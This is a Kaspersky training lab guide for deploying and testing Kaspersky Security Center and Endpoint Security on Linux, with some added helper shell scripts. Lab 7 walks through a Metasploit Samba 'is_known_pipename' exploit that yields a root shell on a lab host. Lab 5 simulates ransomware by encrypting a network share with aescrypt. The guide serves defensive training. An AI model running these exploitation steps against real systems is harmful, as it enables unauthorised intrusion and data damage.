KL 013.11.4 en Labs v1.0

KL 013.11.4: Kaspersky Endpoint Security for Linux

Lab guide

Table of contents
Lab 1. How to install Kaspersky Security Center Linux
Task A: Install and configure MariaDB DBMS
Task B: Configure the firewall ports and change the SELinux mode
Task C: Install Kaspersky Security Center Linux
Task D: Install Kaspersky Security Center Web Console
Lab 2. How to configure Kaspersky Security Center Linux
Task A: Proceed through the Quick Start Wizard to configure KSC Linux
Task B: Poll the network to discover devices
Lab 3. Install Kaspersky Endpoint Security on the managed devices
Task A: Install Kaspersky Network Agent on devices
Task B: Install Kaspersky Endpoint Security on the devices
Lab 4. How to manage devices
Task A: Create administration groups and distribute devices into them
Task B: Create security policies for administration groups
Lab 5. Configuring server protection
Task A: Configure and test File Threat Protection
Task B: Enable and test Web Threat Protection
Task C: Enable Anti-Cryptor and test it
Lab 6. How to collect information about executable files
Lab 7. Test protection against vulnerability exploitation
Task A: Prepare the target server for the attack
Task B: Attack the system
Task C: Enable Web Threat Protection and repeat the attack
Task D: Enable File Threat Protection and repeat the attack
Lab 8. How to manage protection using kesl-control
Task A: Enable remote task management
Task B: Modify task settings using the terminal
Task C: Create a new task using the terminal


Lab 1.
How to install Kaspersky Security Center Linux
Scenario. You need to protect a network that consists of Linux computers with Kaspersky Endpoint Security for
Business. One Kaspersky Security Center is enough for a small network. Install a MariaDB database and
Kaspersky Security Center Administration Server on a dedicated computer running CentOS 8.

Contents. In this lab, we will:

A. Install and configure MariaDB DBMS
B. Configure ports in the firewall and switch SELinux to permissive mode
C. Install Kaspersky Security Center Linux
D. Install Kaspersky Security Center Web Console

Task A: Install and configure MariaDB DBMS

Install and configure a DBMS on the Kaspersky Security Center Linux server.

The workstation, ksc and dns machines must be powered on.

The task is performed on the workstation machine.

Log on to the workstation machine. Use the admin account and the password Ka5per5Ky.

Open an SSH connection to the KSC server:
— Run the terminal
— Carry out
ssh admin@ksc
— Enter the password Ka5per5Ky
If prompted to confirm the connection, type yes and press Enter

To get superuser privileges, carry out
sudo -i
Enter the password Ka5per5Ky


Execute the command
dnf install mariadb-server
Confirm the installation. If prompted to confirm the import of a GPG key, type y and press Enter

Enter the following command to enable automatic start of the MariaDB service on system startup and start the
MariaDB process right now
systemctl enable --now mariadb
Check the status of the MariaDB process
systemctl status mariadb

Log on to the MariaDB console
mysql -u root -p
Enter the password Ka5per5Ky
Set the password for the root user
ALTER USER 'root'@'localhost' IDENTIFIED BY 'Ka5per5Ky';
Create an account for Kaspersky Security Center Linux
CREATE USER 'kscadmin' IDENTIFIED BY 'Ka5per5Ky';
Carry out the following command to grant the necessary permissions to the kscadmin account
GRANT ALL PRIVILEGES ON *.* TO 'kscadmin';
Exit the MariaDB console
exit

Note that this grant gives the kscadmin account full control over every database on the server, and creating the
user without a host part makes it 'kscadmin'@'%', i.e. it may connect from any address. This is acceptable in the
lab, where the DBMS is dedicated to KSC and runs on the same host, but in production restrict the account to the
databases and hosts the Administration Server actually uses.

Copy the MariaDB configuration file with the recommended parameters
cp /distr/my.cnf /etc/my.cnf
Restart the MariaDB service
systemctl restart mariadb


Task B: Configure the firewall ports and change the SELinux mode
Open the ports required for Kaspersky Security Center Linux operation on the KSC server and switch SELinux to
permissive mode to prevent conflicts. In permissive mode SELinux still records every denial in the audit log, so
you keep visibility into what the Administration Server does without it being blocked; disabling SELinux
completely loses that visibility.

The task is performed on the workstation machine.

In the terminal with an ssh session to ksc, carry out the following command (on one line) to open the required
ports in the firewall. 13000/tcp carries Network Agent connections over SSL, 13000/udp is used by the
Administration Server to send notifications to Network Agents, 17000/tcp is the activation proxy and 8080/tcp is
the Web Console:
firewall-cmd --permanent --zone=public --add-port=13000/tcp --add-port=13000/udp --add-port=17000/tcp --add-port=8080/tcp

The --permanent option changes only the saved configuration, so apply the new settings to the running firewall
firewall-cmd --reload
Make sure the necessary ports are opened in the firewall
firewall-cmd --list-ports
Open the SELinux configuration file
nano /etc/selinux/config
Set SELINUX= to permissive
Press Ctrl+O, Enter to save the file
Press Ctrl+X to close the file
Restart the server to apply the changes
reboot
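The state this task is meant to produce on the KSC host (the four ports open in firewalld, SELinux no longer enforcing) is worth checking before the installer runs, because both problems show up later as obscure Network Agent connection failures. The following POSIX shell script is an added example and not part of the lab guide or of Kaspersky's tooling. It assumes the four ports the lab opens are all your deployment needs (check the vendor port list for any additional role you use); the function names, the KSC_PORTS list and the sample inputs in the test are this example's own.

```shell
#!/bin/sh
# Added example, not part of the Kaspersky lab guide: verify the host state that
# Lab 1 Task B is meant to produce on the KSC server (required ports open in
# firewalld, SELinux no longer enforcing) before running the installer.
# KSC_PORTS lists the ports the lab opens; it is an assumption that these are
# all your deployment needs (check the vendor port list for extra roles).

KSC_PORTS="13000/tcp 13000/udp 17000/tcp 8080/tcp"

# missing_ports "<output of firewall-cmd --list-ports>"
# Prints each required port that is absent from the space-separated list, one
# per line; prints nothing when everything is open.
missing_ports() {
    opened=" $1 "
    for p in $KSC_PORTS; do
        case "$opened" in
            *" $p "*) ;;                 # exact token match: 13000/tcp != 13000/udp
            *) printf '%s\n' "$p" ;;
        esac
    done
}

# selinux_mode_from_config "<contents of /etc/selinux/config>"
# Returns the SELINUX= value (enforcing, permissive or disabled), ignoring
# commented-out lines. This is the mode that applies after the reboot;
# `getenforce` shows the mode in effect right now.
selinux_mode_from_config() {
    printf '%s\n' "$1" | sed -n 's/^[[:space:]]*SELINUX=\([a-z]*\).*/\1/p' | tail -n 1
}

# selinux_acceptable MODE: 0 when SELinux will not block KSC. The lab uses
# permissive, which still logs every denial to the audit log, so you can see
# what a future policy would have to allow; disabled loses that visibility.
selinux_acceptable() {
    case "$1" in
        permissive|disabled) return 0 ;;
        *) return 1 ;;
    esac
}

# Live check, only when run on a firewalld/SELinux host (skipped elsewhere).
if command -v firewall-cmd >/dev/null 2>&1; then
    missing=$(missing_ports "$(firewall-cmd --list-ports 2>/dev/null)")
    [ -z "$missing" ] && echo "firewall: all KSC ports open" || echo "firewall: missing $missing"
fi
if [ -r /etc/selinux/config ]; then
    mode=$(selinux_mode_from_config "$(cat /etc/selinux/config)")
    selinux_acceptable "$mode" && echo "selinux: $mode (ok)" || echo "selinux: $mode (KSC may be blocked)"
fi
```

Run it as root on the KSC host after the reboot; the firewall check reads the runtime configuration, so it also catches the case where --permanent was used without --reload.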


Task C: Install Kaspersky Security Center Linux

Install Kaspersky Security Center Linux Administration Server.

The task is performed on the workstation machine.

Open an SSH connection to the KSC server:
— Run the terminal
— Carry out
ssh admin@ksc
Enter the password Ka5per5Ky
To get superuser privileges, carry out
sudo -i
Enter the password Ka5per5Ky

Create a group for the service account
groupadd kladmins
Create an unprivileged account with the primary group kladmins
useradd ksc -g kladmins
Make sure the ksc user is included in the kladmins group
groups ksc

Start the installation of the KSC Linux Administration Server
dnf install /distr/ksc64-14.2.0-23324.x86_64.rpm
Confirm the installation

After the installation completes, run the KSC Linux post-installation script
/opt/kaspersky/ksc64/lib/bin/setup/postinstall.pl


Read and accept the End User License Agreement and Privacy Policy

During the setup, specify the following:
— Choose Administration Server installation mode: 1 (standard)
— Enter Administration Server DNS name or static IP address: 10.28.0.20
— Enter Administration Server SSL port number [13000]: Enter
— Define the approximate number of devices that you intend to manage: 1
— Enter security group name for services: kladmins
— Enter the account name to start Administration Server service: ksc
— Enter the account name to start other services: ksc
— Choose database type to connect to: 1
— Enter the database address: 10.28.0.20
— Enter the database port: 3306
— Enter the database name: kscdb
— Enter the database login: kscadmin
— Enter the database password: Ka5per5Ky


When services start, specify the following:
— Enter the username: admin
— Password: Ka5per5Ky
— Repeat password: Ka5per5Ky

Task D: Install Kaspersky Security Center Web Console

Install the Kaspersky Security Center Web Console component to manage the Kaspersky Security Center Linux
server via its web interface.

The task is performed on the workstation machine.

In the terminal with an ssh session to the ksc server, copy the answer file for the web console installation to
the /etc folder
cp /distr/ksc-web-console-setup.json /etc
Open the answer file for the web console installation
nano /etc/ksc-web-console-setup.json
Read it

Start the web console installation
dnf install /distr/ksc-web-console-14.2.10359.x86_64.rpm


Confirm the installation

After the installation completes, restart all KSC services
systemctl restart KSC*

On the desktop, click the Activities button and launch the Firefox browser
Type https://ksc:8080 in the address bar
When the certificate warning appears, click Advanced and then Accept the risk and continue. The warning is
expected in the lab because the Web Console uses a self-signed certificate; in a production deployment replace
it with a certificate issued by your own CA.
If you can see the Kaspersky Security Center logon page, the installation has completed successfully

Conclusion

In this lab, we have configured the server and installed Kaspersky Security Center Linux on it.

We use MariaDB for the database in our labs, but you can use any other DBMS from the list of supported ones. If
you select another DBMS, consult the respective installation instructions, because different DBMSs require
different setup steps.


Lab 2.
How to configure Kaspersky Security Center Linux
Scenario. You have installed Kaspersky Security Center. Configure the server and poll the network to facilitate
protection deployment on the devices.

Contents. In this lab, we will:

A. Configure the Administration Server
B. Poll the network to discover devices

Task A: Proceed through the Quick Start Wizard to configure KSC Linux
Proceed through the Quick Start Wizard to configure the KSC Linux Administration Server.

The ksc, dns, servera, serverb and workstation machines must be powered on.

The task is performed on the workstation machine.

Open the Kaspersky Security Center Web Console at https://ksc:8080
Log on as admin with the password Ka5per5Ky
The Quick Start Wizard opens immediately after you log on. Click Start to proceed
For Internet connection, select Direct connection and click Next

On the Assets to secure page, specify what devices you plan to protect. Under Areas, select Workstations, and
under Operating systems, select Linux.


On the Encryption in solutions page, select Lite encryption (AES56). This option is designed for Windows
devices only and is displayed because you've selected to protect Workstations.

In the next step, select plug-ins for the applications you plan to manage. This list is also drawn up depending
on the devices and operating systems you've selected to protect. Select Kaspersky Endpoint Security
11.4.0 for Linux.

Wait for the selected plug-ins to be installed.

Select the distributions to download: Kaspersky Network Agent for Linux x64 deb (English) and
Kaspersky Endpoint Security 11.4.0 for Linux (English).


Accept the Kaspersky Security Network statement for Kaspersky Security Center

On the Application activation page, select Enter activation code
Type a code. Ask the trainer where to find it
Click Send

Select the checkbox Automatically distribute license key to managed devices


Click Next
Accept the Kaspersky Security Network statement for Kaspersky Endpoint Security for Linux

On the basic network protection configuration page, double-check the tasks that will be active and confirm their
creation
Wait for the tasks to be created and click Next

On the notification setup page, under Transport Layer Security usage and version, select Do not use TLS and
click Next. This is only because the lab has no mail server; in production, use TLS for the connection to the
SMTP server so that notification contents and mail credentials are not sent in clear text.

Clear the checkbox Run protection deployment wizard and click Finish to complete the Quick Start Wizard.


Open Discovery and Deployment | Deployment & assignment | Installation packages
Switch to the In progress tab
You will see the selected installation packages. To download them, accept their license agreements
Click on the name of an installation package

In the window that opens, click Show EULA

Confirm that you accept the terms of the license agreement

Repeat this for each installation package
After the download completes, all installation packages will appear on the Downloaded tab


Task B: Poll the network to discover devices

Poll the network to discover devices.

The task is performed on the workstation machine.

Open Kaspersky Security Center Web Console
Open Discovery and Deployment | Discovery | IP ranges
Click the Properties button

In the window that opens, select Allow polling and click the Save button

Click Start poll

Wait for the polling to complete

Go to Discovery & deployment | Unassigned devices
Study the list of discovered devices

Conclusion

You have completed initial setup and discovered devices on the network. In our lab environment, we could use IP
addresses to deploy protection and skip polling, but in a real network this would be inconvenient.


Lab 3.
Install Kaspersky Endpoint Security on the managed devices
Scenario. Use the discovery results to install the Network Agent on the networked endpoints. As soon as all
Agents connect to the Administration Server, install Kaspersky Endpoint Security for Linux using the Network
Agent.

Contents. In this lab, we will:

A. Install Kaspersky Network Agent on devices
B. Install Kaspersky Endpoint Security on the devices

Task A: Install Kaspersky Network Agent on devices

Install Kaspersky Network Agent on the discovered devices remotely.

The ksc, dns, servera, serverb and workstation machines must be powered on.

The task is performed on the workstation machine.

Open Kaspersky Security Center Web Console
Open Discovery and Deployment | Deployment & assignment | Protection deployment wizard
Select Kaspersky Network Agent for Linux x64 deb (English) and click Next

On the following page, select Do not add license key to installation package and click Next


On the next page, choose Select devices for installation | Devices and expand the Unassigned devices list,
which contains all discovered devices
Select the servera and serverb devices and click Next

On the task settings page, rename the task Network Agent installation and click Next

On the next page, select Do not move devices and click Next

When prompted for an account, select Account required (Network Agent is not used), click +Add, enter
Account: root, Password: Ka5per5Ky, click OK and then Next. Because no Network Agent is on the target yet,
the Administration Server uses these credentials to log on over SSH and run the installer. The lab uses the root
password for simplicity; in production, use a dedicated deployment account and remove or rotate its credentials
once the agents are in place.


On the installation start page, select the checkbox Run the task after the wizard finishes and click Next
Go to Devices | Tasks and wait for the installation to complete

Task B: Install Kaspersky Endpoint Security on the devices

Remotely install Kaspersky Endpoint Security on the discovered devices.

The task is performed on the workstation machine.

Open Discovery and Deployment | Deployment & assignment | Protection deployment wizard
Select Kaspersky Endpoint Security 11.4.0 for Linux and click Next

On the following page, select Do not add license key to installation package and click Next

Select Kaspersky Network Agent for Linux x64 deb (English) and click Next


On the next page, choose Select devices for installation | Devices and expand the Unassigned devices list,
which contains all discovered devices
Select the servera and serverb devices and click Next

In the task settings window, rename the task Kaspersky Endpoint Security installation and click Next

On the next page, select Do not move devices and click Next

On the next page, select No account required, because the Network Agent is already installed on the servers.
Click Next

On the next page, select the checkbox Run the task after the wizard finishes and click Next


Go to Devices | Tasks and wait for the installation to complete

Open Discovery and Deployment | Unassigned devices and check the Network Agent is installed and Protection
status columns

Conclusion

You have installed Network Agent and then Kaspersky Endpoint Security on the networked devices. The devices
are protected now. Next, you should configure protection.

Lab 4.
How to manage devices
Scenario. You have installed Kaspersky Endpoint Security on the network computers. As different devices may
require different security settings, you need to organize them into administration groups and create a security policy
for each group.

Contents. In this lab, we will:

A. Create administration groups and distribute devices into them
B. Create security policies and assign them to administration groups

Task A: Create administration groups and distribute devices into them

Create two administration groups. Configure automatic distribution rules.

The ksc, dns, servera, serverb and workstation machines must be powered on.

The task is performed on the workstation machine.

Open the Kaspersky Security Center Web Console at https://ksc:8080
Log on as admin with the password Ka5per5Ky


Open Devices | Hierarchy of groups
Select the group Managed devices and click + Add

Name the group Group A and click Add

Create Group B in a similar manner

Go to Devices | Moving rules
Click the Add button

Name the rule Move to A
For the Administration group, select Group A
For Apply rule, select Run once for each device
Select the checkboxes Move only devices that do not belong to an administration group and Enable rule

Switch to the Rule conditions tab
Open the Network subtab, select the IP range option and specify the following values: From: 10.28.0.1 To:
10.28.0.30

Switch to the Applications subtab
For the Network Agent is installed condition, select Yes


Click the Save button

Click the Add button
Name the rule Move to B
For the Administration group, select Group B
For Apply rule, select Run once for each device
Select the checkboxes Move only devices that do not belong to an administration group and Enable rule

Switch to the Rule conditions tab
Open the Network subtab, select the IP range option and specify the following values: From: 10.28.0.31 To:
10.28.0.60

Switch to the Applications subtab
For the Network Agent is installed condition, select Yes
Click the Save button

In the Devices | Moving rules section, select the checkbox next to the rule Move to A, click the three-dot
menu in the upper right corner and select Enforce enabled rule

In the window that opens, under Specify group to run the rule, select Unassigned devices and click Enforce rule

Repeat the same steps for the rule Move to B
When the rules are applied, you will see the respective message


Open Devices | Managed devices
Check which groups the devices belong to now. The two IP ranges (10.28.0.1 to 10.28.0.30 and 10.28.0.31 to
10.28.0.60) do not overlap, so each device can match only one rule; keep ranges disjoint when you design your
own rules, otherwise a device's group depends on which rule happens to run first.

Task B: Create security policies for administration groups

Create security policies and assign them to administration groups.

The task is performed on the workstation machine.

Open Kaspersky Security Center Web Console
Go to Devices | Policies & profiles
To create a new security policy, click the + Add button

Select the application to create the policy for: Kaspersky Endpoint Security 11.4.0 for Linux and click Next

Accept the Kaspersky Security Network Statement and click Next


On the following page, rename the policy Group A policy, set its status to Inactive, disable the option Inherit
settings from parent policy and click Save

Create another policy in a similar manner and name it Group B policy

Select the checkbox next to Group A policy and on the three-dot menu in the upper right corner, click Move


In the administration group selection window, expand the Managed devices group, select Group A and click
Move

Confirm moving the policy

Open Group A policy, change its status to Active and click Save

Move Group B policy to Group B in a similar manner

Activate Group B policy

Make sure the policies are active and belong to their appropriate groups

Conclusion

You have set up automatic device grouping and created security policies for all groups.


Lab 5.
Configuring server protection
Scenario. You have created security policies for managed devices. Configure the components that will efficiently
protect the system.

Contents. In this lab, we will:

A. Configure file protection
B. Configure protection against web threats
C. Configure protection against encryption

Task A: Configure and test File Threat Protection

Make sure File Threat Protection is enabled and exclude from scanning directories and files that must not be
scanned for performance reasons. Make sure File Threat Protection works correctly.

The ksc, dns, servera, serverb, kali and workstation machines must be powered on.

The task is performed on the workstation machine.

Open the Kaspersky Security Center Web Console at https://ksc:8080
Log on as admin with the password Ka5per5Ky
Go to Devices | Policies & profiles
Open Group A policy

Switch to the Application settings tab
In the Essential threat protection section, open File Threat Protection

Make sure File Threat Protection is enabled

Return to the application settings and open Scan exclusions
Under Exclusion scopes, click Configure exclusions


In the window that opens, click + Add

Configure exclusions for directories with MariaDB data:
— Exclusion scope name: MariaDB data directory
— File system, access protocol and path: local
— Path: /var/lib/mysql
— Mask: *
Click OK to save the settings

Click OK to return to the exclusion settings
In the Exclusions by mask area, click Configure exclusions by mask

Click + Add to create a mask

Specify the *.log mask to exclude all log files from scanning
Click OK to save the mask
Click OK to return to the exclusion settings
Click OK again to return to the application settings
Click Save

Every exclusion is a blind spot: a file dropped into /var/lib/mysql, or any file renamed to end in .log, will not be
scanned on access. Exclusions are justified here because the database files are written to constantly and scanning
that path costs performance, but in production keep each exclusion to the narrowest path and mask that solves the
performance problem, and monitor excluded paths by other means.


Switch to the Terminal on the workstation machine
Connect to servera
ssh servera
Enter the password Ka5per5Ky
Download the eicar test file
curl https://www.eicar.org/download/eicar.com.txt -o /tmp/eicar.com.txt

Check if the downloaded file is in the folder
ls /tmp
You can see that the eicar.com.txt file is not there: File Threat Protection scanned it as soon as curl wrote it
to disk and deleted it

Open Kaspersky Security Center Web Console
Open Monitoring & reporting | Event selections
Open the Recent events selection
Find the detection events

Threat detected, Object not disinfected and Object deleted events pertain to the File Threat Protection response
to downloading the malicious file

Open these events and study the details
The Task name field shows which task detected the threat, and the Description field provides more detailed
information about the detection


Close the event selection

The file was deleted by File Threat Protection. A backup copy of each deleted file is saved in case it is a false
positive. You can find it in Operations | Repositories | Backup
You can download a backup copy, restore the file or send it to Kaspersky


Task B: Enable and test Web Threat Protection

Enable Web Threat Protection and try to download a malicious file from the internet.

The task is performed on the workstation machine.

Open the Kaspersky Security Center Web Console at https://ksc:8080
Log on as admin with the password Ka5per5Ky
Go to Devices | Policies & profiles
Open Group A policy
Switch to the Application settings tab
In the Essential threat protection section, open Web Threat Protection
Enable Web Threat Protection and click OK to exit
Click Save to save the modified policy
Switch to the Terminal on the workstation machine
Connect to servera
ssh servera
Enter the password Ka5per5Ky
Download the eicar test file
curl https://www.eicar.org/download/eicar.com.txt -o /tmp/eicar.com.txt

Check if the downloaded file is in the folder
ls /tmp

This time, the file eicar.com.txt is there
View the file contents
less /tmp/eicar.com.txt


Kaspersky Endpoint Security has replaced the contents of the original eicar.com.txt file: the file now holds the
notification returned by Web Threat Protection rather than the EICAR test string, which is why File Threat
Protection had nothing to delete this time
Open Kaspersky Security Center Web Console
Open Monitoring & reporting | Event selections
Open the Recent events selection
You will find the Threat detected and Website blocked events there. The former informs about the detected
threat, and the latter about the blocked connection to the website from which the file was downloaded

Open both events and read their contents
The Task name field shows which component detected the threat, and the Description field provides more
detailed information about the detection

Close the event selection
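Tasks A and B both depend on downloading eicar.com.txt from eicar.org, which needs internet access from servera. The following POSIX shell script is an added example, not part of the lab guide or of Kaspersky's tooling: it writes the EICAR test string locally instead and checks whether on-access File Threat Protection removes the file. Because nothing passes over HTTP, Web Threat Protection never sees it, so the local write isolates the File Threat Protection test from the web component that Task B adds. The function names, the EICAR_DEMO variable and the reuse of the lab's /tmp/eicar.com.txt path are this example's own; the EICAR string and its SHA-256 are the published values.

```shell
#!/bin/sh
# Added example, not part of the lab guide. Lab 5 tests File Threat Protection
# and Web Threat Protection by downloading eicar.com.txt from the internet. The
# File Threat Protection part can be run on a host without internet access by
# writing the EICAR string locally: on-access scanning fires on the write,
# while Web Threat Protection, which watches web traffic, sees nothing.
# EICAR is a harmless test string that every scanner is expected to detect.

# Published SHA-256 of the 68-byte eicar.com test file.
EICAR_SHA256=275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f

# write_eicar PATH: write the test file. Single quotes keep $, \ and ! literal
# and printf '%s' stops the % in the string being read as a format directive.
write_eicar() {
    printf '%s' 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*' > "$1"
}

# file_sha256 PATH: hex digest with whichever tool is available.
file_sha256() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        openssl dgst -sha256 "$1" | sed 's/.*= //'
    fi
}

# eicar_is_valid PATH: 0 if the file is the genuine test file (size and hash),
# so a "not detected" result cannot be blamed on a typo in the string.
eicar_is_valid() {
    [ -f "$1" ] || return 1
    [ "$(wc -c < "$1" | tr -d ' ')" -eq 68 ] && [ "$(file_sha256 "$1")" = "$EICAR_SHA256" ]
}

# on_access_verdict PATH [SECONDS]: "deleted" if the file disappeared within
# the wait (what the lab's Group A policy does: delete, with a copy in Backup),
# otherwise "present". Assumption: File Threat Protection is set to delete; if
# it only blocks access, the file stays and the Threat detected event is the
# evidence instead.
on_access_verdict() {
    n=0; limit=${2:-5}
    while [ "$n" -lt "$limit" ]; do
        [ -e "$1" ] || { echo deleted; return 0; }
        sleep 1
        n=$((n + 1))
    done
    echo present
}

# Stand-alone run: EICAR_DEMO=1 sh eicar-check.sh writes to /tmp like the lab
# and reports the verdict; without the variable the script only defines functions.
if [ "${EICAR_DEMO:-}" = 1 ]; then
    write_eicar /tmp/eicar.com.txt
    echo "verdict: $(on_access_verdict /tmp/eicar.com.txt)"
fi
```

On servera with the Group A policy from Task A, the verdict should be "deleted" and the Recent events selection shows the same Threat detected and Object deleted events as the curl download produced; on a host with no on-access protection the file stays and eicar_is_valid confirms it was the real test string.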


Task C: Enable Anti-Cryptor and test it

Enable protection against encryption and try to encrypt files in a shared folder. Anti-Cryptor protects files in
network shares from encryption by a remote host, which is why the test is run from the kali machine over CIFS
rather than locally on servera.

Start the task on the workstation machine.

Open the Kaspersky Security Center Web Console at https://ksc:8080
Log on as admin with the password Ka5per5Ky
Go to Devices | Policies & profiles
Open Group A policy
Switch to the Application settings tab
In the Advanced Threat Protection section, click Anti-Cryptor

Enable Anti-Cryptor and click OK to exit
Click Save to save the modified policy

Switch to the kali computer.

Log on as kali with the password Ka5per5Ky
Open a Terminal window
To get superuser privileges, carry out
sudo -i
and enter the password Ka5per5Ky
Mount a network share of servera to a local directory
mount -t cifs -o rw //10.28.0.30/share /mnt/share01
When prompted for the password to mount the network folder, press Enter


Check if files have appeared in the folder
ls /mnt/share01

Encrypt files in the network folder
aescrypt -e -p encrypted /mnt/share01/*

The process will not be completed because Kaspersky Endpoint Security will block the host
Press Ctrl+C to stop encryption

Switch to the workstation computer.

Open Kaspersky Security Center Web Console
Open Monitoring & reporting | Event selections
Open the Recent events selection
Pay attention to the Anti-Cryptor events: Encryption detected and Host blocked

View the event details


Switch to the terminal and connect to host servera
ssh servera
Enter the password Ka5per5Ky
To get superuser privileges, carry out
sudo -i
Enter the password Ka5per5Ky
Display the list of files in the directory that has been encrypted
ls /usr/share/share01
Notice that an encrypted file with the .aes extension has appeared among the other files. At the same time, the
encryption application failed to delete the original file because Anti-Cryptor prevented this

Also notice that Anti-Cryptor blocked the host from which encryption was attempted. The default blocking
time is 30 minutes. Anti-Cryptor reacts once it has observed encryption starting, so the first file may already have
an encrypted copy beside it by the time the host is blocked; it limits the damage and does not replace backups.

Conclusion

You have set up protection against encryption, file and web threats and tested how each of these protection
components works.


Lab 6.
How to collect information about executable files
Scenario. You have configured the main protection components. Now, increase network visibility. Kaspersky
Endpoint Security for Linux can collect information about executable files on the endpoint and send it to Kaspersky
Security Center. This will give the administrator a complete picture of the executable files on the network endpoints.

Contents. In this lab, we will inventory the system to get a list of available executable files.

Start the task on the workstation machine.

Open the Kaspersky Security Center Web Console at https://ksc:8080
Log on as admin with the password Ka5per5Ky
Go to Devices | Tasks
To create a new task, click + Add

Specify the following task parameters:
— Application: Kaspersky Endpoint Security 11.4.0 for Linux
— Task type: Inventory scan
— Task name: Inventory scan
— Select devices to which the task will be assigned: Assign task to administration group

Click Next
Expand the Managed devices group and select Group A

Click Next


Select the checkbox Open task details when creation is complete and click Finish

After the configuration completes, the task details will open. Switch to the Application settings tab
Check the Inventory scan scope. It must be enabled and contain the path /usr/bin

Exit the task details to see the list of all created tasks
Find the Inventory scan task, select the respective checkbox and click Start to run the task

Wait for the task status to change to Completed successfully / 100%

Go to Operations | Third-party applications | Executable files. You can see the list of all executable files
that have been found in the /usr/bin directory

Conclusion

You have learned how to collect data for an audit.

Lab 7.
Test protection against vulnerability exploitation
Scenario. Act as an attacker to test how the protection components work. There is a computer with a known
vulnerability on the network. Get access to the computer, load a malicious file. Next, activate the protection
components one by one and observe at what stages the attack will be detected.

Contents. In this lab, we will:

A. Prepare the target server for the attack
B. Launch an attack on an unprotected server
C. Enable Web Threat Protection and repeat the attack
D. Enable File Threat Protection and repeat the attack

Task A: Prepare the target server for the attack

Deactivate all protection components on the target server.

The ksc, dns, servera, serverb, kali and workstation machines must be powered on.

The task is performed on the workstation machine.

Open the Kaspersky Security Center web console at https://ksc:8080
Log on as admin with the password Ka5per5Ky
Go to Devices | Policies & Profiles
Open Group B policy
Switch to the Application settings tab
In the Essential threat protection section, open File Threat Protection
Disable it and click OK
Open Web Threat Protection
Disable it and click OK
Click Save

Task B: Attack the system

Use an exploit to gain access to the system and download a pseudo-malicious file.

Start the task on the kali machine.

Log on to the kali server
— Login: kali
— Password: Ka5per5Ky
Run the terminal
Run Metasploit
msfconsole
Find the exploit samba is known pipename
search pipename
Select the found exploit
use 0
Check the exploit settings
show options
For RHOSTS, specify the target server address
set rhosts 10.28.0.31
Run the exploit
exploit
The message Common shell session 1 opened means that a session with root permissions has been opened

Proceed with sending commands in this console
Download the eicar test file
wget https://www.eicar.org/download/eicar.com.txt
Disconnect from the attacked host
exit
Close the Metasploit console
exit

Task C: Enable Web Threat Protection and repeat the attack

Enable Web Threat Protection and check if the attack succeeds.

Start the task on the workstation machine.

Open the Kaspersky Security Center web console at https://ksc:8080
Log on as admin with the password Ka5per5Ky
Go to Devices | Policies & Profiles
Open Group B policy
Switch to the Application settings tab
In the Essential threat protection section, open Web Threat Protection
Enable it
Click OK to save and exit the Web Threat Protection settings
Click Save

Proceed with the task on the kali machine.

Log on to the kali server
— Login: kali
— Password: Ka5per5Ky
Run the terminal
Run Metasploit
msfconsole
Find the exploit samba is known pipename
search pipename
Select the found exploit
use 0

Check the exploit settings
show options
For RHOSTS, specify the target server address
set rhosts 10.28.0.31
Run the exploit
exploit
The message Common shell session opened means that a session with root permissions has been opened

Proceed with sending commands in this console
Download the eicar test file
wget https://www.eicar.org/download/eicar.com.txt

Web Threat Protection blocked the download of the test file

Roll back the changes using the script
/root/finish.sh
Disconnect from the attacked host
exit
Close the Metasploit console
exit

Proceed with the task on the workstation machine.

Open the Kaspersky Security Center web console at https://ksc:8080
Log on as admin with the password Ka5per5Ky
Open Monitoring & Reporting | Event Selections
Open the Recent events selection
Pay attention to the Threat detected and Access to website blocked events. Web Threat Protection
generated these events when it detected that the test file was being downloaded
Read the events

Task D: Enable File Threat Protection and repeat the attack

Enable File Threat Protection and check if the attack succeeds.

Start the task on the workstation machine.

Open the Kaspersky Security Center web console at https://ksc:8080
Log on as admin with the password Ka5per5Ky
Go to Devices | Policies & Profiles
Open Group B policy
Switch to the Application settings tab
In the Essential threat protection section, open File Threat Protection
Enable it
Click OK to save and exit the File Threat Protection settings
Click Save

Proceed with the task on the kali machine.

Log on to the kali server
— Login: kali
— Password: Ka5per5Ky
Run the terminal

Run Metasploit
msfconsole
Find the exploit samba is known pipename
search pipename
Select the found exploit
use 0
Check the exploit settings
show options
For RHOSTS, specify the target server address
set rhosts 10.28.0.31

Run the exploit
exploit
The exploit has failed to open a session
Close the Metasploit console
exit

Proceed with the task on the workstation machine.

Open the Kaspersky Security Center web console at https://ksc:8080
Log on as admin with the password Ka5per5Ky
Open Monitoring & Reporting | Event Selections
Open the Recent events selection
Pay attention to the Object detected and Threat detected events. File Threat Protection generated these
events when it detected a backdoor attack
Read the events

Conclusion

You have carried out a vulnerability exploitation attack and studied the components that can repel or detect such an
attack at different stages.

Lab 8.
How to manage protection using kesl-control

Scenario. There are several Linux computers in a small isolated segment of the ABC Inc. network. It is impractical to
install Kaspersky Security Center in this segment, and you manage security using scripts and the kesl-control
utility.

Contents. In this lab, we will:

A. Enable remote management
B. Modify task settings using the terminal
C. Create a new task using the terminal

Task A: Enable remote task management

By default, Kaspersky Security Center blocks the ability to manage settings locally; let’s disable this blocking first of
all.

The ksc, dns, servera and workstation machines must be powered on.

The task is performed on the workstation machine.

Open the Kaspersky Security Center web console at https://ksc:8080
Log on as admin with the password Ka5per5Ky
Go to Devices | Policies & Profiles
Open Group A policy
Switch to the Application settings tab
In the Essential threat protection section, open Network Threat Protection
Set all switches from Enforced to Undefined
Click OK to save the settings
Click Save

Task B: Modify task settings using the terminal

Stop the Network Threat Protection task, change its settings with kesl-control and start it again.

The task is performed on the workstation machine.

Open the terminal and connect to servera
ssh servera
Enter the password Ka5per5Ky
To get superuser privileges, carry out
sudo -i
Enter the password Ka5per5Ky
Display the list of tasks
kesl-control --get-task-list
If the Network Threat Protection task is Started, stop it
kesl-control --stop-task network_threat_protection
or
kesl-control --stop-task 17
Output the current settings of the Network Threat Protection task
kesl-control --get-settings 17

Let's modify the task settings:
— Action on threat detection: Inform
— Block attacking host for: 30 minutes
— Trusted IP addresses: 10.28.0.31
To do so, enter the following command:
